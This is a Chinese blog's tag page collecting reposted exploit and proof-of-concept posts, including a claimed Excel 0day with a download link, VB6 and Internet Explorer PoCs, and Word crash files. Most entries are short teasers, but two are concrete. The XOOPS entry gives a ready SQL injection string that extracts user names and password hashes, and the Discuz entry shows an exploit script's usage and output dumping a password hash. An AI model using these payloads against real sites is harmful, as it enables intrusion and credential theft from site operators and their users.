标签 ‘PoC’ 下的日志

[Exploit]Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC(0day)

鬼仔注:幻影出的

来源:milw0rm

Vuln Exposed by: ZhenHan.Liu
Team: Ph4nt0m Security Team
http://www.ph4nt0m.org

Tested on: Full Patched Excel 2003 Sp2, CN

http://www.milw0rm.com/sploits/06272007-2670.zip

Tags: , , ,

VB的两个Stack overflow PoC

鬼仔注:两个都是VB的,就放到一篇日志里发了。
1、Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC
2、Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC

来源:milw0rm

Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC
阅读全文 »

Tags: ,

MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)

来源:milw0rm

阅读全文 »

Tags: , ,

oops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

构造url语句:

/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*


Tags: , , , ,

Full Disclosure: Some 0day Pocs

鬼仔注:很简单的英文,我英文这么烂都看懂了~

来源:seclists

My 7 line python fuzzer found several file format bugs in 3 hours. Quite
alarming.

No deep analysis was done, I leave that to the community.

These are some of the results:

file789-1.doc – Unspecified Overflow in word 2007 – Crash in wwlib.dll –
Code execution is not trivial.

file798-1.doc – Word 阅读全文 »

Tags:

phpwind5.x passport_client.php UPDATE SQL Injection POC

by Superhei
Date: 2007-04-08
http://www.ph4nt0m.org
阅读全文 »

Tags: , , ,

Discuz! 5.0.0 RC1 SQL injection PoC

DZ 5.0.0 RC1用的人应该很少,因为是一个过渡版本,之后很快就出了RC2,接着又出了正式版。

Usage: G:\tt\dz.py <url> <uid>
Example: G:\tt\dz.py http://127.0.0.1/dz/

G:\tt>dz.py http://target.com 1
Discuz! 5.0.0 RC1 SQL injection exploit
Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com

[+] Connect target.com
[+] Trying…
[+] Plz wait a long long time…
[+] The uid=1 password hash is:

阅读全文 »

Tags: , , ,